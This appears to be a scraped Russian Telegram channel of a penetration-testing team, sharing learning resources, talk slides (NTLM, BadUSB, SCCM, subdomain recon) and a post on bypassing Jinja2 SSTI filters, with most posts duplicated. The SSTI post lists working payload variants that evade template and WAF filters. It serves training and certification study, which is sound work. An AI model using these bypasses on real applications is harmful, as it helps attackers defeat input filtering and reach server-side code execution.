[pentest Wi-Fi]
Всем привет!
Начинающий пентестер должен учиться работать с сетями Wi-Fi, в современном мире они находятся повсюду и их распространение увеличивается с каждым днем. Соответственно практически в каждой компании, где проводится пентест, встречается своя сеть Wi-Fi.
В интернете есть вся необходимая для этого теория, не так давно я постарался объединить ее всю. Из этого получилась небольшая лекция про пентест Wi-Fi.
На мой взгляд за 45 минут успел осветить основные аспекты, поделиться инструментами и необходимой теорией.
#WiFi #learn
Всем привет!
Начинающий пентестер должен учиться работать с сетями Wi-Fi, в современном мире они находятся повсюду и их распространение увеличивается с каждым днем. Соответственно практически в каждой компании, где проводится пентест, встречается своя сеть Wi-Fi.
В интернете есть вся необходимая для этого теория, не так давно я постарался объединить ее всю. Из этого получилась небольшая лекция про пентест Wi-Fi.
На мой взгляд за 45 минут успел осветить основные аспекты, поделиться инструментами и необходимой теорией.
#WiFi #learn
[С чего начать путь в пентест?]
Всем привет!
Периодически мне пишут с вопросом - как вкатиться в пентест? На самом деле крутой и интересный вопрос, ответ на который не так просто найти.
У всех разный бэграунд и из-за этого тяжело ответить конкретно. Кто-то знает Linux, кто-то Windows, третий сидит на MacOS и тд., и тп. В общем делаю небольшой пост про то, где можно учиться и приобретать новые знания про пентест.
🚩 HackTheBox. Суть - решение машин по типу CTF. Задания есть самой разной сложности, их много, каждый найдет с чего начать. Из-за большой популярности в интернете есть куча материалов с разборами тасков. Иногда смотреть чьи-то решения тоже полезно - повышается кругозор. Есть машины для подготовки к сертификации.
🚩 Web Security Academy. Площадка для нарешивания тасков по Web'у. Из плюсов - есть теория перед решением заданий, есть разборы этих заданий в интернете, что полезно, если вдруг зашел в тупик. Одна из целей для чего площадка создана - сертификация BSCP.
🚩 Standoff365. Киберполигон, на котором можно хакать аналоги настоящих отраслевых компаний - электростанции, банки, заводы и прочее. Тут стоить отметить, что площадка отечественная и вокруг нее крутится много ИБ движа. Сюда можно залетать командой, поэтому смело можно завлекать друзей.
🚩 WebGoat. Площадка с открытым исходным кодом для отрабатывания навыков пентеста Web'ов. Возможно немного устарела, но в целом базу дает неплохо. Лично сам с нее начинал. Из особенностей стоит отметить, что при прохождении знакомит с инструментов OWASP ZAP - аналог Burp, который будет не вредно узнать.
🚩 GOAD. Это стенд с открытым исходным кодом, который познакомит с Active Directory и всеми актуальными техниками повышения привилегий. Лично пока не трогал, но по отзывам годная штука.
Что читать?
🚩 ][akep - все новости из мира ИБ + крутейшие статьи.
🚩 HackTricks - больше похоже на энциклопедию.
🚩 Habr, Medium, TG. (здесь очень обобщенно, потому что много полезных и интересных блогов, которые будем постепенно накидывать в канал).
#start #learn
Всем привет!
Периодически мне пишут с вопросом - как вкатиться в пентест? На самом деле крутой и интересный вопрос, ответ на который не так просто найти.
У всех разный бэграунд и из-за этого тяжело ответить конкретно. Кто-то знает Linux, кто-то Windows, третий сидит на MacOS и тд., и тп. В общем делаю небольшой пост про то, где можно учиться и приобретать новые знания про пентест.
Что читать?
#start #learn
Please open Telegram to view this post
VIEW IN TELEGRAM
[Презентация с выступления Пик IT]
Всем привет!
Делюсь презентацией с выступления.
➡️ Поговорили о важности участия в олимпиадах по информационной безопасности для школьников
➡️ Осветили интересное практическое задание в рамках одного из региональных этапов олимпиады
➡️ Узнали какие реальные практические навыки может получить школьник в процессе участия
Автор @WILD_41
#learn #start
Всем привет!
Делюсь презентацией с выступления.
Автор @WILD_41
#learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
[Roadmap для специалиста по пентесту внутренней инфраструктуры]
Всем привет!
Как говорил на пару постов выше мой коллега @VlaDriev, часто у начинающих энтузиастов разбегаются глаза от обилия информации по проведению пентеста внутренней инфраструктуры. Решил поделиться интересным на мой взгляд сборником наиболее актуальных и популярных техник по пентесту Active Directory.
Наглядная визуализация, которая точно поможет систематизировать знания, а также откроет что-то новое для тебя.
И всё это оформлено в приятную карточку
#AD #learn
Всем привет!
Как говорил на пару постов выше мой коллега @VlaDriev, часто у начинающих энтузиастов разбегаются глаза от обилия информации по проведению пентеста внутренней инфраструктуры. Решил поделиться интересным на мой взгляд сборником наиболее актуальных и популярных техник по пентесту Active Directory.
Наглядная визуализация, которая точно поможет систематизировать знания, а также откроет что-то новое для тебя.
И всё это оформлено в приятную карточку
#AD #learn
NT_act.pdf
1.6 MB
[ NTLM и базовые атаки на него ]
Всем привет!
Вчера выступил вместе с @VlaDriev с небольшим докладом о протоколе NTLM в рамках встреч сообщества Ural Cyber Security.
Вступайте в сообщество UCS!
Смотрите доклад!
🔹 Рассмотрели теоретическую часть
🔹 Определились с понятиями LM/NT NTLM/netNTLM
🔹 Увидели недостатки реализации
🔹 Обсудили практические атаки на данный протокол
Презентация в приложении
P/S Влад, спасибо, что сподвигнул выступить вместе!
#internal #ucs #learn
Всем привет!
Вчера выступил вместе с @VlaDriev с небольшим докладом о протоколе NTLM в рамках встреч сообщества Ural Cyber Security.
Вступайте в сообщество UCS!
Смотрите доклад!
🔹 Рассмотрели теоретическую часть
🔹 Определились с понятиями LM/NT NTLM/netNTLM
🔹 Увидели недостатки реализации
🔹 Обсудили практические атаки на данный протокол
Презентация в приложении
P/S Влад, спасибо, что сподвигнул выступить вместе!
#internal #ucs #learn
ussc_badusb.pdf
1.2 MB
[ BadUSB на платформе Arduino ]
Сегодня наш коллега Семен Тумашев @cucurucuq выступил с докладом на тему BadUSB атак
🔹Семен на примере разобрал, как из обычной Arduino можно эмулировать клавиатуру
🔹Показал как писать скрипты на Arduino и как это можно использовать на реальных проектах
🔹Осветил базовые способы защиты от данного семейства атак
🎁 Особенно привлекает универсальность такой атаки: payload-ы можно генерировать как под Windows/Linux, так и под MacOS
Тема интересная и будет актуальна как при тестированиях методами соц. инженерии в рамках киберучений, так и при RedTeam проектах
#BadUSB #social #UCS #learn
Сегодня наш коллега Семен Тумашев @cucurucuq выступил с докладом на тему BadUSB атак
🔹Семен на примере разобрал, как из обычной Arduino можно эмулировать клавиатуру
🔹Показал как писать скрипты на Arduino и как это можно использовать на реальных проектах
🔹Осветил базовые способы защиты от данного семейства атак
🎁 Особенно привлекает универсальность такой атаки: payload-ы можно генерировать как под Windows/Linux, так и под MacOS
Тема интересная и будет актуальна как при тестированиях методами соц. инженерии в рамках киберучений, так и при RedTeam проектах
#BadUSB #social #UCS #learn
PassiveReconSubdomains.pdf
2.1 MB
[ Passive Recon: Subdomains]
Всем привет!
Вчера наш коллега Иван Клоченко @iank13 выступил с докладом на тему пассивного поиска поддоменов. Посмотреть выступление можно здесь.
Ключевые моменты доклада:
💬 Что такое DNS
💬 Разница между DNS и Vhost
💬 Работа с passive DNS
💬 Популярные словари для поиска
💬 Утилиты для поиска
Будет интересно всем, кто занимается Bug Bounty и пентестами веб-приложений
#DNS #UCS #WEB #learn
Всем привет!
Вчера наш коллега Иван Клоченко @iank13 выступил с докладом на тему пассивного поиска поддоменов. Посмотреть выступление можно здесь.
Ключевые моменты доклада:
Будет интересно всем, кто занимается Bug Bounty и пентестами веб-приложений
#DNS #UCS #WEB #learn
Please open Telegram to view this post
VIEW IN TELEGRAM
[ Подборка вопросов по кибербезопасности ]
Всем привет! Насобирал небольшой список вопросов на различные темы из мира Кибербеза
🎯 Вопросы на тему администрирования Linux. Тут представлено много классных вопросов, пересекающихся с тематикой кибербеза, а некоторые из них детально проработаны
🎯 Вопросы на тему DevOps. Здесь аналогично вопросам выше, многое бьется с КБ и DevSecOps-ом как следствие
🎯 Вопросы на тему Pentest/AppSec тут и тут. Есть как вопросы с прямым ответом, так и вопросы на "порассуждать" (такие вопросы позволят увидеть гибкость мышления у кандидата)
🎯 Общие вопросы по нескольким отраслям КБ
Кому будут полезными данные вопросы?
🔹 Тех. специалистам для проведения интервью на позиции
🔹 Начинающим специалистам для закрепления/изучения нового
🔹Tech-lead для формирования/совершенствования матрицы компетенций
А вот составлять тесты из данных вопросов не рекомендую: так как они в открытых источниках, то их можно легко нагуглить. Однако как точку опоры точно можно использовать
#learn #start
Всем привет! Насобирал небольшой список вопросов на различные темы из мира Кибербеза
🎯 Вопросы на тему администрирования Linux. Тут представлено много классных вопросов, пересекающихся с тематикой кибербеза, а некоторые из них детально проработаны
🎯 Вопросы на тему DevOps. Здесь аналогично вопросам выше, многое бьется с КБ и DevSecOps-ом как следствие
🎯 Вопросы на тему Pentest/AppSec тут и тут. Есть как вопросы с прямым ответом, так и вопросы на "порассуждать" (такие вопросы позволят увидеть гибкость мышления у кандидата)
🎯 Общие вопросы по нескольким отраслям КБ
Кому будут полезными данные вопросы?
🔹 Тех. специалистам для проведения интервью на позиции
intern
/junior
/ junior+
и проверки hard-skill🔹 Начинающим специалистам для закрепления/изучения нового
🔹Tech-lead для формирования/совершенствования матрицы компетенций
А вот составлять тесты из данных вопросов не рекомендую: так как они в открытых источниках, то их можно легко нагуглить. Однако как точку опоры точно можно использовать
#learn #start
[Ищем секреты с net-creds python3]
Всем привет!👋
Иногда на пентестах требуется послушать трафик или проанализировать pcap-файл, чтобы найти там секретики.
Многие слышали про крутейшую тулзуnet-creds 💻 .
Она хороша всем, кроме использования python2.
И вот теперь силами нашего практиканта была реализована новая версия net-creds💻 .
Из плюсов:
➖ поддержка python3
➖ добавлены pcap example
Какие еще знаете аналоги для анализа трафика на секреты❔
Пишите варианты в комментариях❗
#learn #start #internal #nets
Всем привет!
Иногда на пентестах требуется послушать трафик или проанализировать pcap-файл, чтобы найти там секретики.
Многие слышали про крутейшую тулзу
Она хороша всем, кроме использования python2.
И вот теперь силами нашего практиканта была реализована новая версия net-creds
Из плюсов:
Какие еще знаете аналоги для анализа трафика на секреты
Пишите варианты в комментариях
#learn #start #internal #nets
Please open Telegram to view this post
VIEW IN TELEGRAM
[Подкаст - роль профильного образования в карьере пентестера]
Всем привет!👋
🔊 Вышел новый выпуск нашего замечательного подкаста.🖱
У нас в гостях:
⭐ @Michaelzhm - пентестер, студент бакалавра УрФУ РТФ
⭐ @WILD_41 - пентестер, студент магистрант УрГУПС
💗 Получился очень занимательный и живой диалог с ребятами, думаю многим будет интересно и полезно послушать про их опыт.
Вопросы, которые успели обсудить:
🔘 Где и зачем учитесь ❓
🔘 Почему выбрали учебу в ИБ? 💟
🔘 На сколько тяжело совмещать работу и учебу? 👨💻 🏪
🔘 Что мотивирует на работу, только деньги? 💰
🔘 В ИТ платят больше, чем в ИБ? 💵
🔘 Как искали первую работу? На что обращали внимание?1⃣
🔘 Ваше отношение к black-индустрии ❔
🔘 Совет для начинающих? 🤔
✏ Если после подкаста у вас остались к ребятам вопросы, не стесняйтесь - пишите в комментариях❗
Также напоминаем про наши прошлые выпуски:
🚀 Опять мошенники: что такое «фишинг» и как его избежать
🚀 Кибершпионаж через беспроводные клавиатуры и мыши. Атака MouseJack
#talk #learn #start
Всем привет!
У нас в гостях:
Вопросы, которые успели обсудить:
Также напоминаем про наши прошлые выпуски:
#talk #learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
[Защита детей]
Всем привет!👋
Сегодня международный день защиты детей!😀
В современных реалиях люди с раннего возраста взаимодействуют с цифровым миром, в котором их подстерегают различные угрозы😀 😀 😀 😀
И в связи с этим хотим поделиться ссылками на полезные материалы, которые помогут защититься от угроз😀 :
😀 Тематический подкаст UCS Talk
😀 Доклад с PhD2
😀 Курс для родителей
😀 Киберсказки
😀 Смешарики
😀 Легендарные Фиксики
Всем добра и мира!😀 😀 😀 😀 😀
#learn #talk
Всем привет!
Сегодня международный день защиты детей!
В современных реалиях люди с раннего возраста взаимодействуют с цифровым миром, в котором их подстерегают различные угрозы
И в связи с этим хотим поделиться ссылками на полезные материалы, которые помогут защититься от угроз
Всем добра и мира!
#learn #talk
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Media is too big
VIEW IN TELEGRAM
[Полезные ссылки]
Всем привет!👋
Сегодня у нас полезная информация для начинающих!
Невозможно запомнить каждую команду в голове, для этого существуют заметки.📝 Хочу поделиться ссылками на различные агрегаторы информации, которыми мы частенько пользуемся в работе.
📌 HackTricks - заметки на каждый день обо всем про пентест (про конкретные порты, службы, сервисы)
📌 The Hacker Recipes - годнота в основном про AD (готовые команды и рецепты на все случаи жизни)
📌 PayloadAllTheThings - репозиторий, содержащий различные словари для самых разных проверок, а также наборы техник и чеклистов под конкретные продукты, например AD
📌 Pentester's Promiscuous Notebook - крутые и очень полезные заметки пентестера
📌 Red Team Notes - заметочки с уклоном в red team
Пишите в комментария, чем пользуетесь лично вы?✏️
#learn #start
Всем привет!
Сегодня у нас полезная информация для начинающих!
Невозможно запомнить каждую команду в голове, для этого существуют заметки.
Пишите в комментария, чем пользуетесь лично вы?
#learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
[Обход фильтров в SSTI в Jinja2]
Не так давно в рамках подготовки к OSWE столкнулся с необходимостью обходить фильтры SSTI, проверяющие непосредственный темплейт.
Уязвимое приложение проверяло наличие
Поэтому ловите несколько способов модификации пейлоада, чтобы обойти подобные фильтры или даже WAF целиком:
🔸 Для обхода фильтра по
🔸 Можно использовать сложение строк или закодировать
🔸 Также можно обратиться к атрибутам по индексу
🔸 Кроме того, можно использовать
🔸 Для обхода фильтра по
🔸 Для обхода фильтра по
🔸 В случае, если встретился фильтр по
Конечно количество фильтров может быть разнообразным, но тут уже скорее встает вопрос комбинации предложенных выше методов. 👆
Для закрепления я разработал небольшой стенд 🔥. Кому будет интересно, то можете проверить знания и навыки в деле!
@GigaHack
#web #stand #SSTI #learn #OSWE
Не так давно в рамках подготовки к OSWE столкнулся с необходимостью обходить фильтры SSTI, проверяющие непосредственный темплейт.
Уязвимое приложение проверяло наличие
.__
в строке передаваемого темплейта, что не давало просто использовать пейлоад из HackTricks и наслаждаться RCE на уязвимой машине. Поэтому ловите несколько способов модификации пейлоада, чтобы обойти подобные фильтры или даже WAF целиком:
🔸 Для обхода фильтра по
.__
можно использовать |attr()
{{ ''|attr('__class__’)}}
🔸 Можно использовать сложение строк или закодировать
{{request|attr("__"+"class"+"__")}}
{{''['\x5f\x5fclass\x5f\x5f']}}
🔸 Также можно обратиться к атрибутам по индексу
request["__class__"]
🔸 Кроме того, можно использовать
Statements
для определения переменных в темплейте{% set string = "ssti" %}
{% set class = "__class__" %}
{{ string|attr(class)}}
{% with a = config.__class__.mro()[-1].__subclasses__() %} {{ a }} {% endwith %}
🔸 Для обхода фильтра по
__
можно использовать requests.args
для передачи частей полезной нагрузки в параметрах запроса и |join
для соединения элементов в одну строку{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_
🔸 Для обхода фильтра по
[]
можно использовать |getlist()
. Данный метод возвращает всех значения, связанные с определенным ключом в запросе{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
🔸 В случае, если встретился фильтр по
|join
, можно использовать |format
для форматирования строк по переданным значениями{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
Конечно количество фильтров может быть разнообразным, но тут уже скорее встает вопрос комбинации предложенных выше методов. 👆
Для закрепления я разработал небольшой стенд 🔥. Кому будет интересно, то можете проверить знания и навыки в деле!
@GigaHack
#web #stand #SSTI #learn #OSWE
[Регистрация уязвимостей]
Всем привет!👋
Сегодня хочу поднять важную тему для каждого ИБ-специалиста, особенно пентестера. Однажды вы можете обнаружить уязвимость, которую никто нигде не публиковал, и не важно, специально вы ее искали или нашли мимоходом.👀 Будучи настоящими этичными хакерами у вас может возникнуть желание сообщить об уязвимости вендору/производителю софта или оборудования, но как это это сделать?
Чутка теории: зарегистрировать уязвимость можно в БДУ ФСТЭК (но только в ПО, которое "используется на объектах ГИС и КИИ"), со всеми остальными уязвимостями нужно идти в MITRE и регистрировать CVE.🐈
Весь процесс очень зависит от вендора, с которым вы взаимодействуете, но если вам повезло, то в идеале это будет строиться примерно по схеме, которую я разместил в своих заметках.📝
Иногда бывают различные выдающиеся случаи💻 , о которых лучше говорить отдельно и в формате подкаста или посиделок (кстати, если у вас есть такие истории и желание поделиться ими - дайте знать в комментах или в ЛС) ✏️
В заключении хочется сказать, что безумно приятно взаимодействовать с адекватными вендорами, которые ради тебя готовы даже открыть зал славы.🔥
#cve #learn #notes
Всем привет!
Сегодня хочу поднять важную тему для каждого ИБ-специалиста, особенно пентестера. Однажды вы можете обнаружить уязвимость, которую никто нигде не публиковал, и не важно, специально вы ее искали или нашли мимоходом.
Чутка теории: зарегистрировать уязвимость можно в БДУ ФСТЭК (но только в ПО, которое "используется на объектах ГИС и КИИ"), со всеми остальными уязвимостями нужно идти в MITRE и регистрировать CVE.
Весь процесс очень зависит от вендора, с которым вы взаимодействуете, но если вам повезло, то в идеале это будет строиться примерно по схеме, которую я разместил в своих заметках.
Иногда бывают различные выдающиеся случаи
В заключении хочется сказать, что безумно приятно взаимодействовать с адекватными вендорами, которые ради тебя готовы даже открыть зал славы.
#cve #learn #notes
Please open Telegram to view this post
VIEW IN TELEGRAM
[Кибербез комьюнити]
Всем привет!👋
Коллеги из «ГОС ИТ Богатырева» включили наш канал в папку по кибербезопасности.🗂
В папке собраны каналы с полезной информацией в мире ИБ на самый разный вкус! Думаю, что подборка будет расширяться и обновляться, поэтому следите за новостями!
Добавляйте к себе папку и делить с друзьями и коллегами🏆
#learn #start
Всем привет!
Коллеги из «ГОС ИТ Богатырева» включили наш канал в папку по кибербезопасности.
В папке собраны каналы с полезной информацией в мире ИБ на самый разный вкус! Думаю, что подборка будет расширяться и обновляться, поэтому следите за новостями!
Добавляйте к себе папку и делить с друзьями и коллегами
#learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
[Киберучения 2024]
Всем привет!
С 24 по 26 октября в Екатеринбурге в рамках ИТ-конгресса «Форум будущего» на базе Уральского федерального университета пройдут всероссийские студенческие Киберучения.
Помимо соревнований на форуме также будут интересные доклады и вот несколько из них:
🔔 @WILD_41 выступит с докладом "Fast recon — быстрая разведка при пентесте веб-приложения"🆒
🔔 Евгений Баклушин осветит "Важные вопросы о карьере в ИБ"😮
🔔 Также выступят наши коллеги с докладом про пентест CI/CD: "Пентест CI/CD GitLab на реальном примере"🔝
Если вы будете в Екб — обязательно рекомендуем к посещению, но можно и онлайн👍
Регистрируйтесь и смотрите много крутых докладов!
#learn #conference
Всем привет!
С 24 по 26 октября в Екатеринбурге в рамках ИТ-конгресса «Форум будущего» на базе Уральского федерального университета пройдут всероссийские студенческие Киберучения.
Помимо соревнований на форуме также будут интересные доклады и вот несколько из них:
Если вы будете в Екб — обязательно рекомендуем к посещению, но можно и онлайн
Регистрируйтесь и смотрите много крутых докладов!
#learn #conference
Please open Telegram to view this post
VIEW IN TELEGRAM
SOC_Forum_Дриев_final.pdf
4.5 MB
[Презентация с SOC FORUM]
Наконец-то выкладываю презентацию с SOC FORUM, на мой взгляд получился неплохой доклад, постарался на пальцах объяснить популярные техники повышения привилегий в домене AD через SCCM.📎
Также ссылка на видосик🚀
Если есть какие-то вопросы, пишите в комменты или в ЛС, с удовольствием отвечу!🔥
@GigaHack
#AD #SCCM #MECM #soc_forum2024 #conference #learn
Наконец-то выкладываю презентацию с SOC FORUM, на мой взгляд получился неплохой доклад, постарался на пальцах объяснить популярные техники повышения привилегий в домене AD через SCCM.
Также ссылка на видосик
Если есть какие-то вопросы, пишите в комменты или в ЛС, с удовольствием отвечу!
@GigaHack
#AD #SCCM #MECM #soc_forum2024 #conference #learn
Please open Telegram to view this post
VIEW IN TELEGRAM
[ CyberPack ]
Всем привет👋
У нас в канале присутствуют не только опытные специалисты, но и начинающие исследователи, которые только погружаются в мир ИБ в целом.
В частности, на парах в университете многие ребята часто задают вопросы на тему полезных мануалов и ресурсов для прокачки навыков.
Информации сейчас действительно много, поэтому предлагаем ознакомиться с подборкой, которую подготовил канал BESSEC.🔥
✈️ Добавляйте папку по ссылке 😎
Развивайтесь и получайте удовольствие от процесса⚡️
#education #learn #start
Всем привет
У нас в канале присутствуют не только опытные специалисты, но и начинающие исследователи, которые только погружаются в мир ИБ в целом.
В частности, на парах в университете многие ребята часто задают вопросы на тему полезных мануалов и ресурсов для прокачки навыков.
Информации сейчас действительно много, поэтому предлагаем ознакомиться с подборкой, которую подготовил канал BESSEC.
Развивайтесь и получайте удовольствие от процесса
#education #learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM